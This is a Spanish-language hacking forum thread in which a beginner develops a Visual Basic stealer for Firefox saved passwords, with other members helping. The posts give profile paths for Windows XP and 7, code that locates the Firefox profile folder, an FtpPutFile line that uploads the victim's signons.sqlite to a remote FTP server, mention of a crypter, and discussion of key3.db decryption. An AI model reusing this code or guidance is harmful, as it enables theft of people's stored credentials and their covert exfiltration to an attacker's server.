Hice un stealer para passwords de firefox, funciona perfecto, pero sólo funciona en Win XP en español (y digo en español porque no le agregué la ruta del Win XP en inglés aún)
1) La cosa es que quiero hacer que me robe también las contraseñas en Win7 (inglés y español) y en WinXP en inglés pero no sé las rutas del archivo "signons.sqlite" en esos sistemas operativos.
Alguien sería tan amable de decirme en donde se aloja dicho archivo en cada idioma de Win7 y WinXP ? (o por lo menos digan en donde está en su pc y que sistema operativo e idioma tienen).
WinXP Español: C:\Documents and Settings\USUARIO\Datos de programa\Mozilla\Firefox\Profiles\iwlspcot.default\signons.sqlite
2) Por otro lado, ¿sólo se necesita el archivo signons.sqlite?
Porque probé con mi pc la parte del robo del archivo y funciona perfecto, y probé con el archivo signons.sqlite de un amigo (que me lo pasó amablemente para probar) y también pude ver sus passwords, pero cuando intento hacerlo con otro signons.sqlite de un Win7 no me deja ver las pass :/
Ví también que en Win7 hay un archivo que difiere de tamaño con respecto a WinXP dentro de la misma carpeta "????????.default" que se llama "cert8.db", es el único archivo que difiere del resto :huh:
Alguien me da alguna ayudita?
Gracias!!! ;-)
EDIT: ahora se me ocurrió leer el CurrentVersion del registro y según la versión de windows ejecutar X lineas, también lo puedo hacer con el idioma, de todos modos sigo necesitando las rutas de los distintos OS's.
EDIT2: Listo, ya tengo la parte de detectar OS e idioma del OS terminada, ahora sólo me faltaría saber las rutas de cada OS e Idioma.
EDIT3: Ahora lo tengo funcionando en XP (inglés y español) y Win7 en todos los idiomas ;-). Sigo necesitando el nombre de la carpeta "Datos de programa" en otros idiomas (portugues, alemán, y algún otro) en Windows XP.
Esto parece un monólogo xD
:rolleyes:
Variable de entorno:
http://es.wikipedia.org/wiki/Variable_de_entorno
http://en.wikipedia.org/wiki/Environment_variable
Solucion:
%APPDATA% :D
msgbox Environ("APPDATA")
Saludos ;)
Si, lo sé, el problema era que no sabía como usar el %APPDATA% en la línea que lo necesitaba, también podía usar %HOMEPATH% que es lo que hice en cierta parte del código, quizás me la compliqué demasiado, pero bueno, soy nuevo en VB, tengo 2 semanas de VB, bastante que lo pude hacer desde cero sin usar código de terceros xD
En cierta parte del código usé algo como:
If GetWinVersion = "5,01" And txt_language.Text = "Spanish (Español)." Then
txt_Comando.Text = "dir /b ""%homepath%\DATOSD~1\Mozilla\Firefox\Profiles\*.*"""
End If
If GetWinVersion = "5,01" And txt_language.Text <> "Spanish (Español)." Then
txt_Comando.Text = "dir /b ""%homepath%\AppData\Mozilla\Firefox\Profiles\*.*"""
End If
If GetWinVersion = "6,01" Then
txt_Comando.Text = "dir /b ""%homepath%\AppData\Roaming\Mozilla\Firefox\Profiles\*.*"""
End If
El problema es que no sabía ponerlo aquí:
FtpPutFile hConnection, (txt_discolocal.Text & "\Users\" & txt_UserName.Text & "\AppData\Roaming\Mozilla\Firefox\Profiles\" & txt_resultado.Text & "\signons.sqlite"), "signons.sqlite", FTP_TRANSFER_TYPE_UNKNOWN, 0
Me hubiese evitado conseguir el txt_UserName.Text si hubiese podido usar %APPDATA%, ahora pruebo si lo logro.
Gracias Karcrack, estuve probando tu crypter, está bastante útil.
Le estoy dedicando mucho tiempo a VB a ver si aprendo rápido ^^
Te recomiendo que utilices Variables para almacenar la informacion, y no controles, eso es una chapuza :-\
Asi es como lo haria yo :D
Dim sPath As String
Call Dir$(Environ$("APPDATA") & "\Mozilla\Firefox\Profiles\*.*", vbDirectory)
Call Dir$
sPath = Environ$("APPDATA") & "\Mozilla\Firefox\Profiles\" & Dir$()
MsgBox sPath
Saludos, y mucha suerte ;)
hola =)
Una vez que se haya el archivo key3.db que se hace?
disculpen que reviva.... pero nadie tiene el link? :rolleyes:
estoy peleando con ese key3.db .... pero la verdad estoy en 0.
Podrías compartir el código?
Se que no es una colaboración lo que voy a hacer, pero creé un tema en el que estoy queriendo desarrollar un stealer para Firefox, Chrome e Internet Explorer.
Si a alguno le interesa, los invito a dar una vuelta: http://foro.elhacker.net/net/desarrollo_de_stealer_en_c-t342540.0.html (http://foro.elhacker.net/net/desarrollo_de_stealer_en_c-t342540.0.html)
.
Si no mal recuerdo. para abrir key3.db nesesitas SQLite... corrijanme si me equivoco.
http://www.scribd.com/fullscreen/52882068
Dulces Lunas!¡.
Cita de: BlackZeroX (Astaroth) en 22 Octubre 2011, 00:40 AM
.
Si no mal recuerdo. para abrir key3.db nesesitas SQLite... corrijanme si me equivoco.
http://www.scribd.com/fullscreen/52882068
Dulces Lunas!¡.
Recordas bien, pero los datos estan cifrados en la base de datos
Cita de: jacckker en 24 Noviembre 2011, 19:26 PM
Recordas bien, pero los datos estan cifrados en la base de datos
Eso es lo de menos... si no mal recuerdo estan en base 64... corrijanme si me equivoco.
Dulces Lunas!¡.